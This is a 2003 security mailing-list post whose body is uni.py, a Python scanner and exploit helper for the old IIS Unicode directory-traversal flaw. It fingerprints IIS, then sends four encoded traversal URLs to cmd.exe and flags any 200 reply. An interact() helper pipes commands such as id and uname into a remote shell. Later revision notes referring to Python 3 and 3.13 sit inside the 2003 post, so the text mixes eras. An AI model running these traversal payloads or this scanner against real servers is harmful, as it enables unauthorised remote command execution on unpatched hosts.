no standards for webapp exploitation
From: ned <nd () felinemenace org>
Date: Wed, 2 Jul 2003 00:21:25 -0700 (PDT)
----- uni.py
# i chose unicode because it is still the only
# good IIS exploit! oh and it does not work anymore
# too.
# this file incorporates a few modules from
# a teeny project of mine, and this is the (1/4)
# completed version of the web security module.
# there is no standard definition for web-based exploits.
# VulnXML and whisker.dat (and all of libwhisker
# (whisker RIP)) are for testing purposes ONLY. they
# do not scale to enterprise level, where APIs should
# be easy to work with and provide a high-level
# interface to lower-level scripting languages (like
# python, perl). variables should be extinct outside
# of module classes. the open-source web security community
# would benefit from a standardized way to exploit
# web applications, whether they are remote code execution,
# remote command execution, server and client injection, or
# remote file reading (all of which are going to be covered
# in an independent project which seeks to build a webapp
# exploit-primitives provider on top of the websec class).
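# feel free to send comments and code to me (nd () felinemenace org
# - nd
#mwebsec
# uni.py carries its own copy of the "net" module further down (between the
# #mnet markers), so a missing net.py must not abort the import; when a real
# net.py is on the path the inline definitions below override it anyway.
try:
    from net import *
except ImportError:
    pass
#from utils import *
import sys

# Bytes read from the target per expect_*() call.  The status line and the
# Server: header of a HEAD reply fit comfortably; nothing past this is ever
# inspected.
RECV_SIZE = 500


class websec:
    """Minimal raw-socket HTTP client: fire a hand-built request at a target
    and inspect the first few hundred bytes of the reply.

    Lifecycle: setHost()/setPort() -> connect() -> addreq() -> sendreq() ->
    expect_server()/expect_return_code() -> close().  The reply is read once
    and cached in ``tempdata``; call cleartemp() before reusing the object for
    another request, otherwise the stale reply is re-checked.

    Everything that comes back from the socket is attacker-controlled input.
    It is decoded losslessly (latin-1, so a malformed byte sequence cannot
    crash the scanner) and only inspected with substring tests, never parsed
    as markup or executed.
    """

    def __init__(self):
        self.tempdata = []   # reply lines of the last recv(), split on '\n'
        self.port = 0
        self.host = ""
        self.fds = {}        # "host:port" -> socket, one per connect()
        self.creds = ""      # current "host:port" key into fds
        self.reqbuf = ""     # request text accumulated by addreq()
        self.socket = None   # live socket after connect(), else None

    def _recv_lines(self):
        """Read up to RECV_SIZE bytes from the target and split on '\\n'.

        Python 3 hands back bytes; decode with latin-1 rather than guessing
        UTF-8 so a hostile server cannot raise UnicodeDecodeError here.
        '\\r' is left on the lines, exactly as the original split did.
        """
        data = self.socket.recv(RECV_SIZE)
        if not isinstance(data, str):
            data = data.decode("latin-1")
        return data.split('\n')

    def _status_line(self):
        """Return the first reply line, reading from the socket if needed."""
        if self.tempdata == []:
            debug("websec: recieving data")
            self.tempdata = self._recv_lines()
        return self.tempdata[0]

    # return code that is expected after request
    def expect_return_code(self, codes):
        """Check the reply's status line for one of the expected codes.

        codes: a single code ("200") or several joined by ":" ("200:302").
        Returns 1 when any of them occurs in the status line, else 0.  This
        is a substring test on the status line only -- the numeric status is
        not parsed -- so pass full three-digit codes.  socket.timeout /
        socket.error propagate when the target never answers.
        """
        status = self._status_line()
        f = ""
        found = 0
        if codes.find(":") != -1:
            wanted = codes.split(":")
            debug("websec: looking for %d different return codes" % len(wanted))
        else:
            wanted = [codes]
        for x in wanted:
            if status.find(x) != -1:
                if len(wanted) == 1:
                    debug("websec: %s" % status)
                f += x
                found += 1
        if found == 0:
            debug("websec: did not find expected return code(s)")
            debug("websec: %s" % status)
            return 0
        debug("websec: found return code - %s" % f)
        return 1

    def expect_server(self, type):
        """Return 1 if the reply's Server: header contains ``type``, else 0.

        Only the first Server: header is consulted (header name matched
        case-insensitively).  A reply without any Server: header used to fall
        off the end and return None; it now returns 0 like any other miss.
        The banner is trivially spoofable and often stripped or rewritten by
        proxies, so treat a match or a miss as a hint about the platform, not
        as proof.
        """
        if self.tempdata == []:
            self.tempdata = self._recv_lines()
        for x in self.tempdata:
            if x.lower().startswith("server:"):
                if x.find(type) != -1:
                    debug("websec: found server type - %s" % type)
                    debug("websec: %s" % x)
                    return 1
                debug("websec: did not find server type - %s" % type)
                return 0
        debug("websec: did not find server type - %s" % type)
        return 0

    def _make_creds(self):
        """Build the "host:port" key used for fds from the current settings."""
        return "%s:%d" % (self.host, self.port)

    def setHost(self, host):
        """Set the target host.  The fds key is rebuilt from host and port
        each time, so calling setPort() twice no longer yields "host:80:80"."""
        self.host = host
        self.creds = self._make_creds()

    def setPort(self, port):
        """Set the target port (an int; it is %d-formatted into the key)."""
        self.port = port
        self.creds = self._make_creds()

    def connect(self):
        """Publish host/port to the net module and open a TCP socket.

        Raises socket.error when the connect fails (see get_sock()).
        """
        debug("connection...")
        setCredentials(self.host, self.port)
        self.get_sock()

    def get_sock(self):
        """Open a TCP socket via makeTCPSocket() and remember it under creds.

        makeTCPSocket() returns None on failure; raise here instead of leaving
        self.socket = None for sendreq() to trip over with an AttributeError.
        """
        sock = makeTCPSocket()
        if sock is None:
            raise socket.error("websec: could not connect to %s:%d"
                               % (self.host, self.port))
        self.fds[self.creds] = sock
        self.socket = sock

    def addreq(self, data):
        """Append raw request text (including its CRLFs) to the buffer."""
        self.reqbuf += data

    def sendreq(self):
        """Send the buffered request.  Uses sendall(): send() may write only
        part of the buffer, which would silently truncate the request."""
        debug("sending data!")
        payload = self.reqbuf
        if not isinstance(payload, bytes):
            payload = payload.encode("latin-1")
        self.socket.sendall(payload)

    def cleartemp(self):
        """Drop the cached reply so the next expect_*() reads the socket."""
        self.tempdata = []

    def clearreq(self):
        """Empty the request buffer."""
        self.reqbuf = ""

    def close(self):
        """Close the current socket (no-op if not connected) and forget it."""
        if self.socket is not None:
            self.socket.close()
        self.fds.pop(self.creds, None)
        self.socket = None
#mwebsec
#mnet
import socket
#from utils import *
import random
# pretty explanatory

# Seconds to wait for connect()/recv() before giving up.  Without a timeout a
# target that accepts the connection and never answers hangs the whole scan.
SOCKET_TIMEOUT = 10.0

# Module state shared with websec.connect().  ``set`` shadows the builtin;
# the name is kept because return_set() and debug() read it.  Note it doubles
# as the "credentials known" flag AND the debug-output switch, so
# setCredentials() turns debug() on as a side effect.  Initialised here so
# debug() cannot NameError before the first setCredentials()/debug_set().
set = 0
host = ""
port = 0


def setCredentials(h, p):
    """Record the target host/port for makeTCPSocket()/makeUDPSocket()."""
    global set, host, port
    debug("net.py: host is %s" % h)
    debug("net.py: port is %d" % p)
    host = h
    port = p
    set = 1


def return_set():
    """Return 1 once setCredentials() has been called, else 0."""
    return set


def meep():
    """Log the 'credentials not set' complaint; returns None."""
    debug("net.py: use setCredentials First!")
    return


def _connected_socket(kind, label):
    """Create a socket of ``kind``, connect it to (host, port), return it.

    Returns None (after logging) when the credentials are unset or the
    connect fails.  The socket is created only after the credentials check
    so a premature call does not leak a file descriptor.
    """
    if set != 1:
        return meep()
    s = socket.socket(socket.AF_INET, kind)
    s.settimeout(SOCKET_TIMEOUT)
    try:
        s.connect((host, port))
    except socket.error:
        debug("net.py: Could not connect to %s on %d" % (host, port))
        s.close()
        return None
    debug("net.py: %s socket is ready for reading/writing" % label)
    return s


def makeTCPSocket():
    """Return a TCP socket connected to the stored host/port, or None."""
    return _connected_socket(socket.SOCK_STREAM, "tcp")


def makeUDPSocket():
    """Return a UDP socket connected to the stored host/port, or None.

    The original bound the new socket to a local named ``socket``, which
    shadowed the module and raised UnboundLocalError on every call.
    """
    return _connected_socket(socket.SOCK_DGRAM, "udp")


def interact(s):
    """Write one canned command to an already-open shell socket ``s`` and
    hand the session to the user.  Not used by the scan below.

    No newline is appended, as in the original: the command sits in the
    remote line buffer until the user presses Enter in the interactive
    session.
    """
    # telnetlib is imported lazily: it was never imported in the original
    # and is gone from the stdlib in Python 3.13; nothing else here needs it.
    import telnetlib
    # NOTE(review): the original list also held a commented-out "rm -rf /*";
    # dropped rather than left one keystroke away from being re-enabled.
    cmd = ["id", "uname -a", "echo \"_|_ this!\""]
    shell = telnetlib.Telnet()
    shell.sock = s
    # random stuff (the original wrote random.randint[...] and crashed)
    payload = random.choice(cmd)
    if not isinstance(payload, bytes):
        payload = payload.encode("latin-1")
    shell.write(payload)
    shell.interact()
    return 1
#mnet


def debug(data):
    """Print ``data`` when the shared ``set`` flag is 1 (see debug_set())."""
    if set == 1:
        print(data)


def debug_set():
    """Turn debug() output on -- it is the same flag setCredentials() sets."""
    global set
    set = 1


# not a great example
def main(argv):
    """Probe argv[1] on port 80 for the old IIS Unicode traversal paths.

    Sends a HEAD / and bails out unless the Server: banner mentions IIS
    (spoofable, so a miss may be a false negative), then requests each
    traversal URL over a fresh connection and reports any 200.  Only the
    status code is checked, so a catch-all handler that answers 200 to
    anything counts as a hit: treat the output as a lead, not a confirmed
    finding.  This is an active probe -- point it only at hosts you are
    authorised to test.

    Returns 0 on completion, 2 on bad usage; socket errors propagate.
    """
    if len(argv) < 2:
        sys.stderr.write("usage: %s <host>\n" % (argv[0] if argv else "uni.py"))
        return 2
    target = argv[1]
    debug_set()
    w = websec()
    w.setHost(target)
    w.setPort(80)
    w.connect()
    w.addreq("HEAD / HTTP/1.0\r\n\r\n")
    w.sendreq()
    if w.expect_server("IIS") != 1:
        debug("not IIS")
        w.close()
        return 0
    w.close()
    w.clearreq()
    w.cleartemp()
    # stick this in your pipe and smoke it.
    u = [
        "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
        "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+",
        "/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+",
        "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+",
    ]
    for p, x in enumerate(u, 1):
        debug("trying %d..." % p)
        # The original never substituted the path into the format string and
        # sent a literal "GET %s HTTP/1.0".
        req = "GET %s HTTP/1.0\r\n\r\n" % x
        w.clearreq()
        # Without this the reply to the previous probe is re-checked and the
        # socket is never read again.
        w.cleartemp()
        w.addreq(req)
        w.connect()
        w.sendreq()
        if w.expect_return_code("200") == 1:
            debug("found unicode bug %d on %s" % (p, target))
        w.close()
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))
# ----- uni.py -- http://felinemenace.org/~nd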